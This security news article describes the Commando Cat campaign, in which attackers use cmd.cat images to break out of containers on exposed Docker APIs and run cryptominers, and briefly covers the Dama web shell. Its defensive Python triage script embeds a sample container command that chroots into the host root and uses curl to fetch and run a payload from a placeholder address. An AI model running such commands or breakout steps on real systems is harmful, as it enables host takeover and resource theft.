The threat actor known as Commando Cat has been linked to an ongoing cryptojacking campaign that abuses poorly secured Docker instances to deploy cryptocurrency miners for financial gain. According to Trend Micro researchers, the attackers use the Docker image cmd.cat/chattr as the foothold from which they retrieve the payload from their command-and-control infrastructure. First documented by Cado Security, Commando Cat leverages the open-source Commando project (which builds Docker images on demand and serves them from the cmd.cat domain) to create seemingly benign containers that, once running, break out of their confines: with the host filesystem mounted into the container, a chroot into that mount gives the attacker a shell on the host operating system rather than inside the container.
The attack chain starts with a misconfigured Docker remote API server, typically a daemon reachable over TCP without TLS client authentication, which the attackers use to create a container from the malicious image. From inside that container, with the host filesystem mounted and chroot applied, they run curl or wget to download the miner binary from a command-and-control server. Trend Micro suspects the binary is ZiggyStarTux, an open-source IRC bot based on the Kaiten (Tsunami) malware. Because every step uses a legitimately built image and ordinary Docker API calls, the activity blends in with routine container operations and can evade security tooling that looks for known-malicious files rather than for abuse of Docker configuration. The underlying weakness is a misconfiguration of the Docker daemon, not a vulnerability in Docker itself.
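The steps above leave a recognisable footprint in the container configuration: an image from cmd.cat, the host root filesystem bind-mounted into the container, and an entrypoint that chroots into that mount and fetches something with curl or wget. The following script is an added example written for this article, not tooling from Trend Micro, Cado Security or the Commando project. It runs over the JSON that `docker inspect` produces and flags containers matching that pattern. The sample inspect records embedded in it are constructed for the example (container names, IDs and the 198.51.100.7 address are placeholders); the checks for a privileged container and a shared host PID namespace are heuristics added here as common companions of a host breakout, not details taken from the article.

```python
import json

# Constructed sample of `docker inspect` output for two containers, written for
# this example (not data from the article or from the vendor reports). The first
# models the breakout pattern described above: a container from the cmd.cat/chattr
# image that bind-mounts the host root filesystem, chroots into it and fetches a
# payload with curl. The second is a benign container for comparison.
SAMPLE_INSPECT = json.dumps([
    {
        "Id": "a1b2c3",
        "Name": "/gifted_turing",
        "Config": {
            "Image": "cmd.cat/chattr",
            "Cmd": ["chroot", "/hs", "bash", "-c",
                    "curl -fsSL http://198.51.100.7/payload -o /tmp/.x && chmod +x /tmp/.x && /tmp/.x"],
        },
        "HostConfig": {"Privileged": True, "Binds": ["/:/hs"], "PidMode": "host"},
    },
    {
        "Id": "d4e5f6",
        "Name": "/web",
        "Config": {"Image": "nginx:1.25", "Cmd": ["nginx", "-g", "daemon off;"]},
        "HostConfig": {"Privileged": False,
                       "Binds": ["/srv/www:/usr/share/nginx/html:ro"],
                       "PidMode": ""},
    },
])

DOWNLOADERS = ("curl", "wget")


def host_root_binds(binds):
    """Return the bind mounts whose host-side path is the root filesystem '/'."""
    out = []
    for b in binds or []:
        host_path = b.split(":", 1)[0]
        if host_path == "/":
            out.append(b)
    return out


def assess_container(c):
    """Collect findings for one inspect record.

    Returns a list of human-readable findings; an empty list means nothing
    matched. triage() treats two or more findings as a strong match, so a
    single privileged container or a lone curl invocation does not alert.
    """
    findings = []
    cfg = c.get("Config", {})
    hc = c.get("HostConfig", {})
    cmd = cfg.get("Cmd") or []          # Cmd is null in inspect output when unset
    cmdline = " ".join(cmd)

    if cfg.get("Image", "").startswith("cmd.cat/"):
        findings.append("image pulled from cmd.cat (Commando project)")
    roots = host_root_binds(hc.get("Binds"))
    if roots:
        findings.append(f"host root bind-mounted: {roots}")
    if hc.get("Privileged"):
        findings.append("privileged container (heuristic)")
    if hc.get("PidMode") == "host":
        findings.append("shares host PID namespace (heuristic)")
    if cmd and cmd[0] == "chroot":
        target = cmd[1] if len(cmd) > 1 else "?"
        findings.append(f"entrypoint chroots into {target}")
    if any(d in cmdline for d in DOWNLOADERS):
        findings.append("curl/wget in container command (remote payload fetch)")
    return findings


def triage(inspect_json):
    """Map container name -> findings for every container with a strong match."""
    hits = {}
    for c in json.loads(inspect_json):
        f = assess_container(c)
        if len(f) >= 2:
            hits[c["Name"]] = f
    return hits


if __name__ == "__main__":
    # On a real host: docker inspect $(docker ps -aq) | python3 this_script.py
    for name, findings in triage(SAMPLE_INSPECT).items():
        print(name)
        for f in findings:
            print("  -", f)
```

Run against live data with `docker inspect $(docker ps -aq)` piped into `triage()`. The two-finding threshold keeps legitimate privileged containers (monitoring agents, CI runners) from alerting on their own, while the combination of a host-root bind mount and a chroot entrypoint is rare enough in normal workloads to be worth a page. Closing the exposed API (binding the daemon to a Unix socket, or requiring TLS client certificates if remote access is needed) removes the entry point entirely.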
In a related disclosure, Akamai researchers highlighted a campaign exploiting years-old security flaws in ThinkPHP applications, for which patches have long been available, to deliver a web shell dubbed Dama. Suspected to be orchestrated by a Chinese-speaking threat actor, the campaign relies on a web shell with advanced capabilities, including gathering system data, uploading files, and escalating privileges. The attackers are not limited to ThinkPHP installations and target a broad range of systems, underscoring an ongoing trend in which attackers rely on fully featured web shells for persistent, fine-grained control over compromised hosts.